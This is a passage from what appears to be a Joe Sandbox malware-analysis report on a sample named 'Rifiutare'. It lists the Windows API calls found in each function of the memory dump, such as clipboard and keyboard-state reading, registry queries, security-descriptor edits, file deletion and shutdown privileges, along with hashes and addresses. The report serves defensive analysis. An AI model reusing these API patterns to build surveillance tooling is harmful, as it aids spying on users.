                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                • Instruction ID: 482031d3b9c732a802aa1122d8bc5508cbc9d3730c46073338753ea0c8616d1a
                                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                • Instruction Fuzzy Hash: A6310478A00505DFC718CF09C880A6AF7B5FB89301B3482A5E81ACB652D731EEC5CB95
                                                                                APIs
                                                                                • CloseHandle.KERNELBASE(00000000,00000000,?,00C3111D,00CCDBF4), ref: 00C362CD
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandle
                                                                                • String ID:
                                                                                • API String ID: 2962429428-0
                                                                                • Opcode ID: 87bee83bef92cc57847a021510a5121381779d622ad7ebfc4c1bdc82c4b8170d
                                                                                • Instruction ID: 6a77a91beaab4b49de72ada3f343f8930d16736e90e2c606ff4eeb54f63764da
                                                                                • Opcode Fuzzy Hash: 87bee83bef92cc57847a021510a5121381779d622ad7ebfc4c1bdc82c4b8170d
                                                                                • Instruction Fuzzy Hash: FCE0B6B5410B02DFC3314F1AE804412FBF4FFE53617218A2ED4E682660D3B1598A8B50
                                                                                APIs
                                                                                  • Part of subcall function 00C91973: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C9198E
                                                                                  • Part of subcall function 00C91973: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C91415,?,?,?), ref: 00C9199A
                                                                                  • Part of subcall function 00C91973: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C91415,?,?,?), ref: 00C919A9
                                                                                  • Part of subcall function 00C91973: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C91415,?,?,?), ref: 00C919B0
                                                                                  • Part of subcall function 00C91973: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C919C7
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C91446
                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C9147A
                                                                                • GetLengthSid.ADVAPI32(?), ref: 00C91491
                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00C914CB
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C914E7
                                                                                • GetLengthSid.ADVAPI32(?), ref: 00C914FE
                                                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C91506
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00C9150D
                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C9152E
                                                                                • CopySid.ADVAPI32(00000000), ref: 00C91535
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C91564
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C91586
                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C91598
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C915BF
                                                                                • HeapFree.KERNEL32(00000000), ref: 00C915C6
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C915CF
                                                                                • HeapFree.KERNEL32(00000000), ref: 00C915D6
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C915DF
                                                                                • HeapFree.KERNEL32(00000000), ref: 00C915E6
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00C915F2
                                                                                • HeapFree.KERNEL32(00000000), ref: 00C915F9
                                                                                  • Part of subcall function 00C91A0D: GetProcessHeap.KERNEL32(00000008,00C9142B,?,00000000,?,00C9142B,?), ref: 00C91A1B
                                                                                  • Part of subcall function 00C91A0D: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C9142B,?), ref: 00C91A22
                                                                                  • Part of subcall function 00C91A0D: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C9142B,?), ref: 00C91A31
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                • String ID:
                                                                                • API String ID: 4175595110-0
                                                                                • Opcode ID: 5b5c03494bf6cb7aa7bc5aa2788607db09dd263fc7a3a7427499820ff556efc8
                                                                                • Instruction ID: 6a11ad2155bb12b6446417eb28fe58571ada93c6a5a01abff44fc5f220564ab7
                                                                                • Opcode Fuzzy Hash: 5b5c03494bf6cb7aa7bc5aa2788607db09dd263fc7a3a7427499820ff556efc8
                                                                                • Instruction Fuzzy Hash: 3F71207290020AAFDF10DFA5DC49FEEBBB8BF44311F1A4125F916A7191D7719A05CBA0
                                                                                APIs
                                                                                • OpenClipboard.USER32(00CCDBF4), ref: 00CAF36F
                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 00CAF37D
                                                                                • GetClipboardData.USER32(0000000D), ref: 00CAF389
                                                                                • CloseClipboard.USER32 ref: 00CAF395
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00CAF3CD
                                                                                • CloseClipboard.USER32 ref: 00CAF3D7
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00CAF402
                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 00CAF40F
                                                                                • GetClipboardData.USER32(00000001), ref: 00CAF417
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00CAF428
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00CAF468
                                                                                • IsClipboardFormatAvailable.USER32(0000000F), ref: 00CAF47E
                                                                                • GetClipboardData.USER32(0000000F), ref: 00CAF48A
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00CAF49B
                                                                                • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00CAF4BD
                                                                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00CAF4DA
                                                                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00CAF518
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00CAF539
                                                                                • CountClipboardFormats.USER32 ref: 00CAF55A
                                                                                • CloseClipboard.USER32 ref: 00CAF59F
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                • String ID:
                                                                                • API String ID: 420908878-0
                                                                                • Opcode ID: 55d520cef1becff7ad898493e6a49814e4670314974201de665895ea158b9fc9
                                                                                • Instruction ID: acd37de7799a08e3effcbdee9be1692f65c434a917f091ab2dcd3c271b582791
                                                                                • Opcode Fuzzy Hash: 55d520cef1becff7ad898493e6a49814e4670314974201de665895ea158b9fc9
                                                                                • Instruction Fuzzy Hash: 3A61E2302043029FD710EF60D889F2EB7A4EF89308F14496DF456872A1DB31DE46DB62
                                                                                APIs
                                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00CA4657
                                                                                • _wcslen.LIBCMT ref: 00CA4684
                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00CA46B4
                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00CA46D5
                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 00CA46E5
                                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00CA476C
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00CA4777
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00CA4782
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                • String ID: :$\$\??\%s
                                                                                • API String ID: 1149970189-3457252023
                                                                                • Opcode ID: 20ba7acbbcec683e06aba85ce6877becf78b4f5507f3b74473979415ee9ca675
                                                                                • Instruction ID: 2996c24446f09482ec419b529e583b4b496e58c1479c315e1df82da0aceeeefc
                                                                                • Opcode Fuzzy Hash: 20ba7acbbcec683e06aba85ce6877becf78b4f5507f3b74473979415ee9ca675
                                                                                • Instruction Fuzzy Hash: 9A31B4B550010AABDB219FA0DC49FEF37BDEF8A715F1041B9F519D2060EBB497858B24
                                                                                APIs
                                                                                  • Part of subcall function 00CBD11B: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CBBE2E,?,?), ref: 00CBD138
                                                                                  • Part of subcall function 00CBD11B: _wcslen.LIBCMT ref: 00CBD174
                                                                                  • Part of subcall function 00CBD11B: _wcslen.LIBCMT ref: 00CBD1E2
                                                                                  • Part of subcall function 00CBD11B: _wcslen.LIBCMT ref: 00CBD218
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CBC6BE
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00CBC729
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00CBC74D
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00CBC7AC
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00CBC867
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00CBC8D4
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00CBC969
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00CBC9BA
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00CBCA63
                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00CBCB02
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00CBCB0F
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                • String ID:
                                                                                • API String ID: 3102970594-0
                                                                                • Opcode ID: 64cdb2b1bb5576e36162797678bf4cb6eeae235fee7432c2b3a9ac8154feba2b
                                                                                • Instruction ID: 2a3736ae896b2f9e870d625ffd52042bb8b5372409349d57dc3f9db6dbab3f9c
                                                                                • Opcode Fuzzy Hash: 64cdb2b1bb5576e36162797678bf4cb6eeae235fee7432c2b3a9ac8154feba2b
                                                                                • Instruction Fuzzy Hash: FA027D71604200AFD714CF28C8D5E6ABBE4EF49314F1884ADF85ADB2A2DB31ED42DB51
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?), ref: 00C9A4BA
                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00C9A53B
                                                                                • GetKeyState.USER32(000000A0), ref: 00C9A556
                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00C9A570
                                                                                • GetKeyState.USER32(000000A1), ref: 00C9A585
                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00C9A59D
                                                                                • GetKeyState.USER32(00000011), ref: 00C9A5AF
                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00C9A5C7
                                                                                • GetKeyState.USER32(00000012), ref: 00C9A5D9
                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00C9A5F1
                                                                                • GetKeyState.USER32(0000005B), ref: 00C9A603
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: State$Async$Keyboard
                                                                                • String ID:
                                                                                • API String ID: 541375521-0
                                                                                • Opcode ID: 7d18edfb5996e9a1771d271d4227ce355c4c6e3e16f6aa3fea8d2ef302618b8e
                                                                                • Instruction ID: 269d87737f02f6fbe6992ea454444557f6cf0fe312e31582a9b9b3158fce8d82
                                                                                • Opcode Fuzzy Hash: 7d18edfb5996e9a1771d271d4227ce355c4c6e3e16f6aa3fea8d2ef302618b8e
                                                                                • Instruction Fuzzy Hash: 9C41A6A0604FC96DFF319A64C80C7B5BEA06B11304F098459D5E64A1C2EBE49FC8C7E3
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00CA72D2
                                                                                • FindClose.KERNEL32(00000000), ref: 00CA7323
                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CA734F
                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CA7366
                                                                                  • Part of subcall function 00C3C110: _wcslen.LIBCMT ref: 00C3C11A
                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CA738D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: FileTime$FindLocal$CloseFirstSystem_wcslen
                                                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                • API String ID: 409396820-2428617273
                                                                                • Opcode ID: 1c6b71b66428ee4b77576d66503d4ff5d61c7cfca8d377ce772611000f3aee1a
                                                                                • Instruction ID: eb3b393063d12304cd5756a196221c151b446f38e509bd644c7df0825961366c
                                                                                • Opcode Fuzzy Hash: 1c6b71b66428ee4b77576d66503d4ff5d61c7cfca8d377ce772611000f3aee1a
                                                                                • Instruction Fuzzy Hash: 5DA16FB1418241AFC714EB64CC85EAFB3ECBF85304F40491DF99586192EB34DA48DB62
                                                                                APIs
                                                                                  • Part of subcall function 00C350F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C35035,?,?,00C74641,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C35117
                                                                                  • Part of subcall function 00C9E8F5: CompareStringW.KERNEL32(00000400,00000001,?,?,00C9D818,?,?,?,?,?,?,00000000), ref: 00C9E947
                                                                                  • Part of subcall function 00C9E970: GetFileAttributesW.KERNEL32(?,00C9D6EB), ref: 00C9E971
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00C9D878
                                                                                • CompareStringW.KERNEL32(00000400,00000001,?,?,?,?,?,?,?), ref: 00C9D92D
                                                                                • DeleteFileW.KERNEL32(?), ref: 00C9D93F
                                                                                • MoveFileW.KERNEL32(?,?), ref: 00C9D952
                                                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C9D96F
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C9D999
                                                                                  • Part of subcall function 00C9D9FE: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00C9D97E,?,?), ref: 00C9DA14
                                                                                • FindClose.KERNEL32(00000000,?,?,?), ref: 00C9D9B5
                                                                                • FindClose.KERNEL32(00000000), ref: 00C9D9C6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: File$Find$CloseCompareDeleteString$AttributesCopyFirstFullMoveNameNextPath
                                                                                • String ID: \*.*
                                                                                • API String ID: 597992297-1173974218
                                                                                • Opcode ID: a289b5adc5492de7bb94a8509dfdb8d9eb2a226a0967778cb119f7f1df231e66
                                                                                • Instruction ID: 8cb0384eb658e445474b45604d4c4caecdaa1ee4e069296a6f4e6f4682e0e2a0
                                                                                • Opcode Fuzzy Hash: a289b5adc5492de7bb94a8509dfdb8d9eb2a226a0967778cb119f7f1df231e66
                                                                                • Instruction Fuzzy Hash: E5619D3180014DAECF15FBA0DE96AEEB7B5AF15304F204165E452771A2EF316F09EB61
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                • String ID:
                                                                                • API String ID: 1737998785-0
                                                                                • Opcode ID: 3eb8c47b296f812b3f2694062ed6adbac99964f5bd513018245d741f2058900c
                                                                                • Instruction ID: a9c173b07f0345df875cc5361403f153bbb776cbbdc5bf72b7c338981b6951f6
                                                                                • Opcode Fuzzy Hash: 3eb8c47b296f812b3f2694062ed6adbac99964f5bd513018245d741f2058900c
                                                                                • Instruction Fuzzy Hash: 21418D35604612AFD720CF65E889F19BBA0EF45319F14C4ADF46A8B672CB35ED42CB90
                                                                                APIs
                                                                                  • Part of subcall function 00C91F3D: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C91F87
                                                                                  • Part of subcall function 00C91F3D: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C91FB4
                                                                                  • Part of subcall function 00C91F3D: GetLastError.KERNEL32 ref: 00C91FC4
                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 00C9F109
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                • String ID: $ $@$SeShutdownPrivilege
                                                                                • API String ID: 2234035333-3163812486
                                                                                • Opcode ID: 317ecfed8ccb31e82b3690f78cf32b5afdd35321e4510ef6b7b2af3830ddccd9
                                                                                • Instruction ID: a0ccc6962a9802c76febfac4d773446915265637065b710882225fd38ddd74f5
                                                                                • Opcode Fuzzy Hash: 317ecfed8ccb31e82b3690f78cf32b5afdd35321e4510ef6b7b2af3830ddccd9
                                                                                • Instruction Fuzzy Hash: 52018672710215ABEF2866BCEC9EFBE725C9B04354F150439FD53E21D2DAA05E429290
                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C920F9
                                                                                • UnloadUserProfile.USERENV(?,?), ref: 00C92105
                                                                                • CloseHandle.KERNEL32(?), ref: 00C9210E
                                                                                • CloseHandle.KERNEL32(?), ref: 00C92116
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00C9211F
                                                                                • HeapFree.KERNEL32(00000000), ref: 00C92126
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                • String ID:
                                                                                • API String ID: 146765662-0
                                                                                • Opcode ID: a1d01319ac58ad5472a409440dab1e2563b1376bde98b351d1d0ac46f47e60d2
                                                                                • Instruction ID: 10556f2dbe39f4ce5422cc29de65c53405a147452c065b6209ef5b84993b0435
                                                                                • Opcode Fuzzy Hash: a1d01319ac58ad5472a409440dab1e2563b1376bde98b351d1d0ac46f47e60d2
                                                                                • Instruction Fuzzy Hash: 33E0C2B6004505BBDB011BA2EC0CF0EBF39FB49322B184234F22682070CB329422DB50
                                                                                APIs
                                                                                  • Part of subcall function 00C3C110: _wcslen.LIBCMT ref: 00C3C11A
                                                                                • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00CAA379
                                                                                • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00CAA48C
                                                                                  • Part of subcall function 00CA418B: GetInputState.USER32 ref: 00CA41E2
                                                                                  • Part of subcall function 00CA418B: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CA427D
                                                                                • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00CAA3A9
                                                                                • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00CAA476
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                • String ID: *.*
                                                                                • API String ID: 1972594611-438819550
